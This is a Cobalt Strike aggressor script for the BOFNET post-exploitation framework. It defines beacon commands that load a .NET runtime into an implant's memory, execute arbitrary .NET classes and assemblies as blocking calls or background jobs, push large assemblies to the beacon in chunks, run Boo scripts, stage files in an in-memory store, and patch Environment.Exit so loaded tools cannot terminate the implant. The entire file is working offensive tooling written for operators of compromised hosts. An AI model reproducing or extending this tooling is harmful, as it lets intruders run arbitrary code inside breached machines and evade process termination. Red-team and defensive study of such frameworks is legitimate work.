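# beacons
# Console help registration for the bofnet_* aliases in this script.
# Each call supplies (command name, one-line description, long help text).
# These strings are only help text; argument validation, where present,
# happens inside the alias bodies.
beacon_command_register("bofnet_init", "Initialize beacon ready to run BOFNET", "Synopsis: bofnet_init \nInitialize beacon ready to run BOFNET");
beacon_command_register("bofnet_shutdown", "Shutdown the BOFNET AppDomain", "Synopsis: bofnet_shutdown \nShutdown the BOFNET AppDomain");
beacon_command_register("bofnet_list", "List all executable BOFNET's available", "Synopsis: bofnet_list \nList all executable BOFNET's available");
beacon_command_register("bofnet_listassemblies", "List all loadded assembiles inside BOFNET", "Synopsis: bofnet_listassemblies \nList all loadded assembiles inside BOFNET");
beacon_command_register("bofnet_execute", "Execute a BOFNET class", "Synopsis: bofnet_execute class arg1 arg2 ...\nExecute's a BOFNET class along with all arguments supplied. Arguments with spaces should be quoted.\n");
beacon_command_register("bofnet_load", "Load a .NET assembly containing additional BOFNET classes", "Synopsis: bofnet_load assembly_path\nLoad a .NET assembly containing additional BOFNET classes\n");
beacon_command_register("bofnet_job", "Execute a BOFNET class as a background job in a seperate threead", "Synopsis: bofnet_job class arg1 arg2\nExecute a BOFNET class as a background job\n");
beacon_command_register("bofnet_jobs", "List active BOFNET background jobs", "Synopsis: bofnet_jobs\nList active BOFNET background jobs\n");
beacon_command_register("bofnet_jobstatus", "Dump the console buffer of an active BOFNET background job", "Synopsis: bofnet_jobstatus jobid\nDump the console buffer of an active BOFNET background job\n");
beacon_command_register("bofnet_jobkill", "Kills a running jobs thread (warning, could leave leaked resources/sockets behind", "Synopsis: bofnet_jobkill jobid\nKills a running jobs thread (warning, could leave leaked resources/sockets behind\n");
beacon_command_register("bofnet_boo", "Runs a Boo script in a temporary AppDomain which is then unloaded", "Synopsis: bofnet_boo filename.boo\nRuns a Boo script in a temporary AppDomain which is then unloaded\n");
# The synopsis line is separated from the description by "\n"; the original
# had a stray "\U" here, which is not a newline escape.
beacon_command_register("bofnet_vfs_add", "Uploads a file to the in memory VFS storage", "Synopsis: bofnet_vfs_add local_path filename content_type\nUploads a file to the in memory VFS store\n");
beacon_command_register("bofnet_executeassembly", "Execute a standard .NET assembly calling the entry point (blocks until completion)", "Synopsis: bofnet_executeassembly assembly_name arg1 arg2 ...\nExecute a standard .NET assembly calling the entry point and passing all arguments supplied (blocks until completion)\n");
beacon_command_register("bofnet_jobassembly", "Execute a standard .NET assembly calling the entry point (as a background job)", "Synopsis: bofnet_jobassembly assembly_name arg1 arg2 ...\nExecute a standard .NET assembly calling the entry point and passing all arguments supplied (as a background job)\n");
beacon_command_register("bofnet_patchexit", "Re-patch .NET's Environment.Exit() to prevent exit", "Synopsis: bofnet_patchexit \nRe-patch .NET's Environment.Exit() to prevent exit");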
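# Read a whole file from the operator's machine into a byte string.
#   $1 - path of the file to read
# Returns the bytes read.
# NOTE(review): a failed openf() is not detected here; the result of reading
# from a bad handle is whatever readb() yields in that case.
sub readAllFileData {
    # Sleep variables are global unless declared, so keep the handle and
    # buffer local instead of overwriting script-wide names.
    local('$fileHandle $fileData');

    $fileHandle = openf($1);
    $fileData = readb($fileHandle, -1);    # -1 requests all available bytes
    closef($fileHandle);
    return $fileData;
}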
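# Wrap every element of an argument array in double quotes and join the
# results with single spaces.
#   $1 - array of argument strings
# Returns the joined string ("" for an empty array).
# Leading whitespace is stripped from each element before quoting.
# NOTE(review): a double quote inside an element is passed through unescaped;
# how the receiving parser treats that is not visible in this file.
sub addQuotes {
    # Work on local copies: the original wrote to undeclared (global) names
    # and assigned to the foreach variable itself.
    local('@quoted $entry $trimmed');
    @quoted = @();

    foreach $entry ($1) {
        # Same pattern as before: group 0 is the text after leading whitespace.
        $trimmed = matches($entry, '\s*(.*)')[0];
        push(@quoted, "\"$trimmed\"");
    }

    return join(" ", @quoted);
}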
# Find and read the native loader object that matches the beacon's architecture.
#   $1 - beacon id
# Returns the object file's bytes, or $null (after logging to the beacon
# console) when the expected file is not among the script resources.
sub loadBOFNativeRuntime {
    # File name is built from barch($1): bofnet_execute.cpp.<arch>.obj
    $nativeBOFPath = script_resource('bofnet_execute.cpp.' . barch($1) . '.obj');

    # Guard clause: report the missing object and hand back $null.
    if (!-exists $nativeBOFPath) {
        blog($1, "[!] The BOFNET native runtime file $nativeBOFPath doesn't exist");
        return $null;
    }

    return readAllFileData($nativeBOFPath);
}
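# Run a BOFNET class with an already-packed argument blob.
#   $1 - beacon id
#   $2 - class name
#   $3 - raw argument bytes, appended after the class name and a NUL byte
sub bofnet_execute_raw {
    $bofnetNative = loadBOFNativeRuntime($1);

    # loadBOFNativeRuntime returns $null (and logs why) when the object file
    # is missing; stop here in that case. The test must be `is $null`: the
    # previous `!= $null` did not express "load failed".
    if ($bofnetNative is $null) {
        return;
    }

    beacon_inline_execute($1, $bofnetNative, "go", "$2\x00" . $3);
}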
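# Not secure random string by any means!
# Build a string of $1 characters drawn from [a-zA-Z0-9] using rand().
#   $1 - number of characters to generate
# Returns the generated string ("" when $1 is 0).
# In this file the result is used only as a chunk-group id in bofnet_load;
# it must not be used where unpredictability matters.
sub generateRandomString {
    # Declared local so the loop counter and buffer do not overwrite
    # script-wide variables (Sleep variables are global unless declared).
    local('$validChars $validCharsCount $randomString $idx');

    $validChars = "abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ1234567890";
    $validCharsCount = strlen($validChars);
    $randomString = "";

    for ($idx = 0; $idx < $1; $idx++) {
        $randomString = $randomString . charAt($validChars, rand($validCharsCount));
    }

    return $randomString;
}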
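# bofnet_init
# Reads the native loader object and BOFNET.dll from the script resources and
# tasks beacon $1 to run BOFNET.Bofs.Initializer (with the DLL bytes as its
# argument) followed by BOFNET.Bofs.PatchEnvironmentExit.
alias bofnet_init {
    $bofnetNative = loadBOFNativeRuntime($1);

    # $null means the loader object was not found (already logged); stop.
    # `is $null` replaces `!= $null`, which did not express "load failed".
    if ($bofnetNative is $null) {
        return;
    }

    # NOTE(review): no -exists check is made for BOFNET.dll before reading it.
    $bofnetRuntime = readAllFileData(script_resource('BOFNET.dll'));

    btask($1, "Initializing BOFNET");
    beacon_inline_execute($1, $bofnetNative, "go", "BOFNET.Bofs.Initializer\x00" . $bofnetRuntime);
    beacon_inline_execute($1, $bofnetNative, "go", "BOFNET.Bofs.PatchEnvironmentExit\x00");
}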
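# bofnet_shutdown
# Tasks beacon $1 to run BOFNET.Bofs.Shutdown through the native loader object.
alias bofnet_shutdown {
    $bofnetNative = loadBOFNativeRuntime($1);

    # $null means the loader object was not found (already logged); stop.
    # `is $null` replaces `!= $null`, which did not express "load failed".
    if ($bofnetNative is $null) {
        return;
    }

    btask($1, "Shuting down BOFNET");
    beacon_inline_execute($1, $bofnetNative, "go", "BOFNET.Bofs.Shutdown\x00");
}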
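# bofnet_list
# Tasks beacon $1 to run BOFNET.Bofs.List through the native loader object.
alias bofnet_list {
    $bofnetNative = loadBOFNativeRuntime($1);

    # $null means the loader object was not found (already logged); stop.
    # `is $null` replaces `!= $null`, which did not express "load failed".
    if ($bofnetNative is $null) {
        return;
    }

    btask($1, "Listing BOFNET classes");
    beacon_inline_execute($1, $bofnetNative, "go", "BOFNET.Bofs.List\x00");
}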
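# bofnet_listassemblies
# Tasks beacon $1 to run BOFNET.Bofs.ListAssemblies through the native loader
# object.
alias bofnet_listassemblies {
    $bofnetNative = loadBOFNativeRuntime($1);

    # $null means the loader object was not found (already logged); stop.
    # `is $null` replaces `!= $null`, which did not express "load failed".
    if ($bofnetNative is $null) {
        return;
    }

    btask($1, "Listing loaded BOFNET assemblies");
    beacon_inline_execute($1, $bofnetNative, "go", "BOFNET.Bofs.ListAssemblies\x00");
}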
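# bofnet_execute class [arg1 arg2 ...]
# Tasks beacon $1 to run the class named in $2. Any further console arguments
# are individually double-quoted by addQuotes and appended after one space;
# the command string always ends with a NUL byte.
alias bofnet_execute {
    $bofnetNative = loadBOFNativeRuntime($1);

    # $null means the loader object was not found (already logged); stop.
    # `is $null` replaces `!= $null`, which did not express "load failed".
    if ($bofnetNative is $null) {
        return;
    }

    # Default: no arguments, just the terminating NUL.
    $bofArguments = "\x00";

    # @_ holds $1, $2, ...; skipping two entries leaves the class arguments.
    @argParts = sublist(@_, 2);
    if (size(@argParts) > 0) {
        $bofArguments = " " . addQuotes(@argParts) . "\x00";
    }

    btask($1, "Attempting to execute BOFNET $2");
    beacon_inline_execute($1, $bofnetNative, "go", $2 . $bofArguments);
}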
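# bofnet_load assembly_path
# Reads the file at $2 from the operator's machine and sends it to beacon $1
# in fixed-size pieces, each delivered to BOFNET.Bofs.AssemblyLoader together
# with a shared random id.
alias bofnet_load {
    local('$assemblyData $chunkSize $rawData $numChunks $remainder $id $i $chunk');

    # 900k chunks sent to leave room for protocol data too
    $chunkSize = 1024 * 900;

    # Validate the path before announcing the task. The original also read
    # $nativeBOFPath (a different file, set as a side effect elsewhere) into
    # $assemblyData at this point; that value was never used, so the read
    # has been removed.
    if (!-exists $2) {
        blog($1, "[!] The file $2 doesn't seem to exist, missing quotes by any chance?");
        return;
    }

    btask($1, "Attempting to load large .NET assembly $2 into BOFNET");

    $rawData = readAllFileData($2);

    # NOTE(review): the loop bound assumes `/` on two integers truncates —
    # confirm for the Sleep version in use.
    $numChunks = strlen($rawData) / $chunkSize;
    $remainder = strlen($rawData) % $chunkSize;

    # One id per upload, reused for every chunk of this file.
    $id = generateRandomString(8);

    # Full-size chunks.
    for ($i = 0; $i < $numChunks; $i++) {
        $chunk = substr($rawData, $i * $chunkSize, ($i * $chunkSize) + $chunkSize);
        $assemblyData = bof_pack($1, "Zib", $id, $chunkSize, $chunk);
        bofnet_execute_raw($1, "BOFNET.Bofs.AssemblyLoader", $assemblyData);
    }

    # Trailing partial chunk. The packed integer is still $chunkSize, as in the
    # full-size case.
    # NOTE(review): the end index is one past start + $remainder; kept as
    # written — confirm it is intended.
    if ($remainder > 0) {
        $chunk = substr($rawData, $numChunks * $chunkSize, ($numChunks * $chunkSize) + $remainder + 1);
        $assemblyData = bof_pack($1, "Zib", $id, $chunkSize, $chunk);
        bofnet_execute_raw($1, "BOFNET.Bofs.AssemblyLoader", $assemblyData);
    }
}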
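# bofnet_job class [arg1 arg2 ...]
# Tasks beacon $1 to run BOFNET.Bofs.Jobs.JobRunner with the class named in $2
# as its first argument. Further console arguments are double-quoted by
# addQuotes; the command string always ends with a NUL byte.
alias bofnet_job {
    $bofnetNative = loadBOFNativeRuntime($1);

    # $null means the loader object was not found (already logged); stop.
    # `is $null` replaces `!= $null`, which did not express "load failed".
    if ($bofnetNative is $null) {
        return;
    }

    # Default: no arguments, just the terminating NUL.
    $bofArguments = "\x00";

    # @_ holds $1, $2, ...; skipping two entries leaves the class arguments.
    @argParts = sublist(@_, 2);
    if (size(@argParts) > 0) {
        $bofArguments = " " . addQuotes(@argParts) . "\x00";
    }

    btask($1, "Attempting to start BOFNET $2 as a job");
    beacon_inline_execute($1, $bofnetNative, "go", "BOFNET.Bofs.Jobs.JobRunner " . $2 . $bofArguments);
}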
# bofnet_jobs
# Forwards to the bofnet_execute alias with the JobList class and no arguments.
alias bofnet_jobs {
    local('$commandLine');
    $commandLine = "BOFNET.Bofs.Jobs.JobList";
    fireAlias($1, "bofnet_execute", $commandLine);
}
# bofnet_jobstatus jobid
# Forwards to the bofnet_execute alias with the JobStatus class followed by $2.
# $2 is appended as typed; no check is made that a job id was supplied.
alias bofnet_jobstatus {
    local('$commandLine');
    $commandLine = "BOFNET.Bofs.Jobs.JobStatus " . $2;
    fireAlias($1, "bofnet_execute", $commandLine);
}
# bofnet_jobkill jobid
# Forwards to the bofnet_execute alias with the JobKill class followed by $2.
# $2 is appended as typed; no check is made that a job id was supplied.
alias bofnet_jobkill {
    local('$commandLine');
    $commandLine = "BOFNET.Bofs.Jobs.JobKill " . $2;
    fireAlias($1, "bofnet_execute", $commandLine);
}
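# bofnet_boo filename.boo [arg1 arg2 ...]
# Reads the script file at $2 from the operator's machine, packs it with the
# quoted remaining arguments, and hands the blob to BOFNET.Bofs.Boo.BooRunner
# on beacon $1.
alias bofnet_boo {
    local('$booCode @argParts $scriptArgs $args');

    # Same missing-file handling as bofnet_load: report and stop rather than
    # packing the result of reading a path that is not there.
    if (!-exists $2) {
        blog($1, "[!] The file $2 doesn't seem to exist, missing quotes by any chance?");
        return;
    }

    $booCode = readAllFileData($2);
    $scriptArgs = "";

    # @_ holds $1, $2, ...; skipping two entries leaves the script arguments.
    @argParts = sublist(@_, 2);
    if (size(@argParts) > 0) {
        $scriptArgs = addQuotes(@argParts);
    }

    # The beacon id is $1; the original passed $bid, which is never assigned
    # in this script.
    $args = bof_pack($1, "bZ", $booCode, $scriptArgs);

    blog($1, "Executing script $2 with the following arguments: $scriptArgs");
    bofnet_execute_raw($1, "BOFNET.Bofs.Boo.BooRunner", $args);
}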
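# bofnet_executeassembly assembly_name [arg1 arg2 ...]
# Tasks beacon $1 to run BOFNET.Bofs.ExecuteAssembly with the assembly named in
# $2. Further console arguments are double-quoted by addQuotes; the command
# string always ends with a NUL byte. Per the registered help text this call
# blocks until the assembly completes.
alias bofnet_executeassembly {
    $bofnetNative = loadBOFNativeRuntime($1);

    # $null means the loader object was not found (already logged); stop.
    # `is $null` replaces `!= $null`, which did not express "load failed".
    if ($bofnetNative is $null) {
        return;
    }

    # Default: no arguments, just the terminating NUL.
    $bofArguments = "\x00";

    # @_ holds $1, $2, ...; skipping two entries leaves the assembly arguments.
    @argParts = sublist(@_, 2);
    if (size(@argParts) > 0) {
        $bofArguments = " " . addQuotes(@argParts) . "\x00";
    }

    btask($1, "Attempting to start .NET assembly in blocking mode");
    beacon_inline_execute($1, $bofnetNative, "go", "BOFNET.Bofs.ExecuteAssembly " . $2 . $bofArguments);
}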
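# bofnet_jobassembly assembly_name [arg1 arg2 ...]
# Tasks beacon $1 to run BOFNET.Bofs.Jobs.JobRunnerAssembly with the assembly
# named in $2. Further console arguments are double-quoted by addQuotes; the
# command string always ends with a NUL byte.
alias bofnet_jobassembly {
    $bofnetNative = loadBOFNativeRuntime($1);

    # $null means the loader object was not found (already logged); stop.
    # `is $null` replaces `!= $null`, which did not express "load failed".
    if ($bofnetNative is $null) {
        return;
    }

    # Default: no arguments, just the terminating NUL.
    $bofArguments = "\x00";

    # @_ holds $1, $2, ...; skipping two entries leaves the assembly arguments.
    @argParts = sublist(@_, 2);
    if (size(@argParts) > 0) {
        $bofArguments = " " . addQuotes(@argParts) . "\x00";
    }

    btask($1, "Attempting to start .NET assembly as a job");
    beacon_inline_execute($1, $bofnetNative, "go", "BOFNET.Bofs.Jobs.JobRunnerAssembly " . $2 . $bofArguments);
}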
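# bofnet_patchexit
# Tasks beacon $1 to run BOFNET.Bofs.PatchEnvironmentExit through the native
# loader object (the same class bofnet_init runs after initialization).
alias bofnet_patchexit {
    $bofnetNative = loadBOFNativeRuntime($1);

    # $null means the loader object was not found (already logged); stop.
    # `is $null` replaces `!= $null`, which did not express "load failed".
    if ($bofnetNative is $null) {
        return;
    }

    btask($1, "Re-patching .NET Environment.Exit()");
    beacon_inline_execute($1, $bofnetNative, "go", "BOFNET.Bofs.PatchEnvironmentExit\x00");
}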
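# bofnet_vfs_add local_path filename content_type
# Reads the file at $2 from the operator's machine, packs it with the hosting
# filename ($3) and content type ($4), and hands the blob to BOFNET.Bofs.VFS on
# beacon $1.
alias bofnet_vfs_add {
    local('$fileData $args');

    # @_ is (beacon id, local_path, filename, content_type): exactly four.
    if (size(@_) != 4) {
        # Usage text names this alias; the original printed "bofnet_hostfile",
        # which is not a command this script registers.
        blog($1, "[!] Usage: bofnet_vfs_add local_path hosting_filename content_type");
        return;
    }

    # NOTE(review): $2 is read without an -exists check.
    $fileData = readAllFileData($2);
    $args = bof_pack($1, "bZZ", $fileData, $3, $4);

    blog($1, "Attempting to host file $2 (" . strlen($fileData) . " bytes) inside the BOFNET VFS");
    bofnet_execute_raw($1, "BOFNET.Bofs.VFS", $args);
}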